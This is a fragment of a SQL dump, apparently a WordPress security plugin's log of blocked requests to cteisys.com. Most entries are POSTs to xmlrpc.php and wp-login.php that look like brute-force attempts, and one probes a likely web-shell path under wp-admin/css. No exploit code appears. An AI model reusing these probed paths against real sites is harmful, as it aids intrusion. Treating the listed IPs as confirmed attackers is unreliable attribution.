AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vnagsoLMK9uIQmYCB2lX1fVS',0,1664130287.8325,18758,'','POST',403,0,515,0,1,'',0),('213.152.162.84',3583550036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BybZY42SXuswh9F3MmpOkHf0',0,1664130114.9976,3623,'','POST',403,0,515,0,1,'',0),('198.58.127.244',3325722612,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UbDHgJYV7lq9nBA3cvu6SEOG',0,1664149938.5713,18600,'','POST',403,0,515,0,1,'',0),('62.102.148.166',1046910118,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8hJtnl3GTpK0xoCIdZviPRYg',0,1664149343.9114,2423,'','POST',403,0,515,0,1,'',0),('196.44.176.39',3291263015,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Te6iGhcWpvDrBZlOEb84L1aX',0,1664149102.4037,18868,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mlSPdtpizr8Oejxy3RVWZqa1',0,1664148292.9947,18713,'','POST',403,0,515,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kJSKVxlQ04wWIyjXZqARDM5z',0,1664147489.6163,19108,'','POST',403,0,515,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rmVpJl8HiKs9FjxzBMObGADQ',0,1664146661.9462,19426,'','POST',403,0,515,0,1,'',0),('91.207.102.163',1540318883,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eEqtGbfN8YLls1mzrhnZoHwd',0,1664145993.9556,1147,'','POST',403,0,515,0,1,'',0),('91.224.23.225',1541412833,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zuYirNoWqFSydklKw7sXLQRD',0,1664145896.8650,2350,'','POST',403,0,515,0,1,'',0),('185.156.175.35',3114053411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wZmytUJoiReqsjTWN4cL1vVK',0,1664135919.4697,18020,'','POST',403,0,515,0,1,'',0),('149.18.50.22',2500997654,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','px0ZlTPoIKBafw7QEzmVWh4t',0,1664142759.3391,18836,'','POST',403,0,515,0,1,'',0),('103.8.25.74',1728584010,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HNeOToywJc1YCrsi7zVtPXnZ',0,1664142021.5023,20173,'','POST',403,0,515,0,1,'',0),('103.153.214.231',1738135271,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','F1xmLgPGf5eiVHlsXpohtrSI',0,1664141295.8661,18821,'','POST',403,0,515,0,1,'',0),('213.152.161.5',3583549701,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lbyYJZAXzNGMBnSQHwKVErIP',0,1664138319.3133,18313,'','POST',403,0,515,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pceInXm236vMKWAqLblPUSdY',0,1664145079.0519,2709,'','POST',403,0,515,0,1,'',0),('139.59.228.23',2335958039,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TAUinWFjeKkgZ6ovMm2H71Cs',0,1664143518.9900,18945,'','POST',403,0,515,0,1,'',0),('128.199.109.135',2160553351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kygPU8jAOou5rJK63lBHZGeL',0,1664144289.1569,2267,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rfUREmdxiI41wBeFYSokLV39',0,1664150723.5036,19873,'','POST',403,0,515,0,1,'',0),('43.205.46.185',734867129,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JIMvWeob2Xyxcpu1fq3A8wCY',0,1664152349.1402,18801,'','POST',403,0,515,0,1,'',0),('148.72.244.254',2487809278,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','e9myW083UuA6PvXhQgdpxwSr',0,1664153996.3793,19028,'','POST',403,0,515,0,1,'',0),('66.29.131.126',1109230462,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','stR2VyFPkQnOxUBiMEWjpAfr',0,1664154822.7663,18345,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NbU4JLT3BtP7QVeFMhapzACI',0,1664158122.7085,2354,'','POST',403,0,515,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BZE8IjMy7N4UbXPf6JpTOtrL',0,1664162028.3410,18571,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZxvatskAjeI7mXW4Sud68cpD',0,1664161489.4216,18883,'','POST',403,0,515,0,1,'',0),('82.102.23.131',1382422403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OheNXCtwYaRGk4pg7VqFH9oB',0,1664161538.8156,2245,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XgIbr4atsQpnAzBTLOf2CNhF',0,1664167973.4508,10118,'','POST',403,0,515,0,1,'',0),('31.172.80.147',531386515,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8IoRM5Wqlg3jdDvHkZVbzrua',0,1664167129.3592,18947,'','POST',403,0,515,0,1,'',0),('118.98.64.188',1986150588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','f1qjGhFbLyXpS6koKmWOsari',0,1664165422.2075,19274,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Ccjd2HyKsxpDuPmtValGheRN',0,1664166282.7173,18414,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1NxRUkLDVKFwZfn3Ts2XM4Bu',0,1664168845.1603,18723,'','POST',403,0,515,0,1,'',0),('103.90.235.70',1734011718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y50qGJftHeR3vl2m4zdEKFoZ',0,1664169690.9843,2825,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Lt8NAMrxhle0KDRvgmBEc7wI',0,1664170567.4249,2366,'','POST',403,0,515,0,1,'',0),('140.143.188.163',2358230179,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tnYE6PNidqlcp2hab8KsyO04',0,1664176711.9666,18614,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tT9WQbfGpFDVjwSMaLnqBRId',0,1664177342.3679,18427,'','POST',403,0,515,0,1,'',0),('31.172.80.147',531386515,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Hi5rCumyVwE1TItJopBsj7Q4',0,1664175914.4055,18546,'','POST',403,0,515,0,1,'',0),('209.145.54.196',3515954884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','u7J9QrCRokLiTqzlZOwfXA81',0,1664180248.9608,18961,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','p67DyBe4MAZ51knvrbTfz2Gi',0,1664179826.9827,2776,'','POST',403,0,515,0,1,'',0),('35.194.233.240',599976432,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','riaQ53EuUefsLSCZFBgp2G46',0,1664179432.5767,18765,'','POST',403,0,515,0,1,'',0),('51.79.30.143',860823183,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uyURqBJE49vGrzmhTniCFW5H',0,1664186422.6464,481,'','POST',403,0,600,0,1,'',0),('186.234.80.121',3135918201,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bngpY7ycKNVUH5wJ1DdtRIxf',0,1664185843.6877,484,'','POST',403,0,600,0,1,'',0),('213.149.103.132',3583338372,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','baJFvjzpk6o9Ld8yNBCRQiP2',0,1664184549.0264,495,'','POST',403,0,600,0,1,'',0),('87.107.144.155',1466667163,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sfji0LDOk6YFH7VWx8aAQ9Kd',0,1664185249.7028,506,'','POST',403,0,600,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Qy8L4sTkgO6EmYdhZ91jHFnV',0,1664183876.6567,552,'','POST',403,0,600,0,1,'',0),('217.160.166.188',3651184316,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hXaF7AC1l8dysZKnxw3pV0jq',0,1664183168.1572,696,'','POST',403,0,600,0,1,'',0),('208.113.149.124',3497104764,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IhF9jtRZof1ncUHK5GC6z3Pa',0,1664182952.6092,2624,'','POST',403,0,515,0,1,'',0),('213.149.103.132',3583338372,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4l0FAwT3LIQK8zaGVNRUW5kp',0,1664190922.2145,605,'','POST',403,0,600,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','M0Op2BlcjhLSmd3eK7zwTX1D',0,1664191569.6745,483,'','POST',403,0,600,0,1,'',0),('152.32.211.172',2552288172,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w40skozPI6u2LAWaDmcGEjUJ',0,1664190257.1307,540,'','POST',403,0,600,0,1,'',0),('162.0.216.181',2717964469,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QOBlcder7oMymxiDzGhwL4n8',0,1664196364.7189,520,'','POST',403,0,600,0,1,'',0),('203.112.72.51',3413133363,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CrQKsw5hGPT7EoL8BaAb9ZV1',0,1664197044.0009,2448,'','POST',403,0,515,0,1,'',0),('81.88.53.17',1364735249,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aYIrW9XvZHhCqFmORnlTNyVA',0,1664195694.2631,633,'','POST',403,0,600,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1r76JAhInBPvEqXRwaH5xDdp',0,1664194759.9609,489,'','POST',403,0,600,0,1,'',0),('147.139.178.177',2475406001,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CfD1OQ4thpFkwm6PgTKiAjSu',0,1664195435.8945,522,'','POST',403,0,600,0,1,'',0),('45.125.239.179',763228083,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vlOeAaTkbZwFCtRHE14qG962',0,1664194119.5768,520,'','POST',403,0,600,0,1,'',0),('90.156.169.12',1520216332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JTIhALKGVpauNEvMbqYU9ZjH',0,1664197393.5577,2692,'','POST',403,0,515,0,1,'',0),('2.184.67.138',45630346,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QhCK7rHXeRpJ8vWFlsxMkdS1',0,1664207743.3420,1565,'','POST',403,0,515,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','azyRC0UGdMHWe2qcDQIAf3YF',0,1664206912.1489,18838,'','POST',403,0,515,0,1,'',0),('67.227.251.154',1139014554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IOVaN6Rv0py8Wjf4eEdcsbCr',0,1664206480.0975,15323,'','POST',403,0,515,0,1,'',0),('157.245.45.127',2650090879,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','smjfUzLAH2PEnq8SgyTdY14B',0,1664206061.9383,18735,'','POST',403,0,515,0,1,'',0),('31.172.80.147',531386515,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iJ12naPVtmMWGKRHX3FjLkhD',0,1664205222.3358,2333,'','POST',403,0,515,0,1,'',0),('209.97.173.182',3512839606,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1zuTRDbfr0dgA4GaYymnWU7h',0,1664204792.1956,11798,'','POST',403,0,515,0,1,'',0),('208.113.153.235',3497105899,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','H51QxERJngzCaKO2NPL3phFB',0,1664208350.8495,1239,'','POST',403,0,600,0,1,'',0),('101.43.127.191',1697349567,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Zx9LMWp6X4IsBqv2GPhQF5bf',0,1664208133.7263,19160,'','POST',403,0,515,0,1,'',0),('51.195.148.190',868455614,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','xI2XjclLVNtZ7wF90TkvQ4W1',0,1664213279.2414,17201,'','POST',403,0,600,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','dyUC1z0AIfO6rwFlB5cKHbLD',0,1664212294.8986,561,'','POST',403,0,600,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','XtLFPa6SDe5A7h98sOWZzRlQ',0,1664216211.0623,14822,'','POST',403,0,600,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-admin/css/colors/blue/nin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','HY3cgqdL1ZDBSyW2QGz9Jk5E',0,1664216207.9861,12041,'','GET',403,0,700,0,1,'',0),('185.126.219.43',3112098603,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','t3jsLvrkdCX7g1aiHRWoM5p4',0,1664215242.2627,17107,'','POST',403,0,600,0,1,'',0),('162.144.87.29',2727368477,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','SKxRn8dVuHc2LmAC1Be9XpvZ',0,1664225777.4808,1342,'','POST',403,0,600,0,1,'',0),('162.240.28.177',2733644977,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','IAv7VK2uMY6tUolfDeOG9h04',0,1664224820.9314,1336,'','POST',403,0,600,0,1,'',0),('143.244.155.35',2415172387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','jOwy9buNBD8MAGTI01Z6tKJo',0,1664221949.9873,10437,'','POST',403,0,600,0,1,'',0),('85.191.40.94',1438591070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','wJWKGbhqrDHRAkSFX86LYu9y',0,1664221010.3846,1886,'','POST',403,0,600,0,1,'',0),('157.245.110.251',2650107643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','eoRYGxykiQU5q2zCFnIDuSbZ',0,1664220058.0874,18090,'','POST',403,0,600,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','5oQZp1VJai4d9IqgUvLfNhEb',0,1664223863.3002,1256,'','POST',403,0,600,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','PTVsRWxi8Gkvt5u3OhIJM2bB',0,1664222902.6355,4613,'','POST',403,0,600,0,1,'',0),('104.248.124.41',1761115177,'','https://cteisys.com/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','n0eu6REU81zSZfhqPL4mo7iN',0,1664227338.2727,306,'','GET',403,0,700,0,1,'',0),('46.32.228.70',773907526,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','5DP9LCRtbkdJ1yGEpIXlKOBq',0,1664230554.2063,18374,'','POST',403,0,600,0,1,'',0),('103.130.212.57',1736627257,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','q5cL0ECZIl1BzKDwgAWUtT92',0,1664235221.1006,848,'','POST',403,0,515,0,1,'',0),('128.199.203.239',2160577519,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MTpQRJWj6K1axCV8ycGqPZ3A',0,1664235194.4023,18817,'','POST',403,0,515,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','10FlD36vQatoJczyH4hSuIix',0,1664234443.2225,605,'','POST',403,0,600,0,1,'',0),('51.38.192.91',858177627,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','YlPbBGWpdn7FyM5I6ZJe9SQR',0,1664233467.1122,17760,'','POST',403,0,600,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Nm8Ys2blCL0GjoyRAWwUfDzS',0,1664237123.0051,527,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pQoW2ucqgJHPy8FTAwXexO1I',0,1664237101.4799,18755,'','POST',403,0,515,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jahqrfClJM3z7tRwN5KxTE6O',0,1664241171.1677,1346,'','POST',403,0,515,0,1,'',0),('106.14.141.22',1779338518,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SVsrInDHM2ALFKyzpXlvPxW9',0,1664241127.0703,1678,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','blyNBv1O7hpEwk03geJZiQXa',0,1664240495.8093,568,'','POST',403,0,515,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','W58oLs3Oux1KqSnYC9dQaIFl',0,1664240464.5098,2064,'','POST',403,0,515,0,1,'',0),('47.57.186.73',792312393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UBuf29aNxHCk10ElId8mQ57s',0,1664245273.6873,19506,'','POST',403,0,515,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','FYGPv13pqKws9VRujxyUM7tJ',0,1664245288.9272,3520,'','POST',403,0,600,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 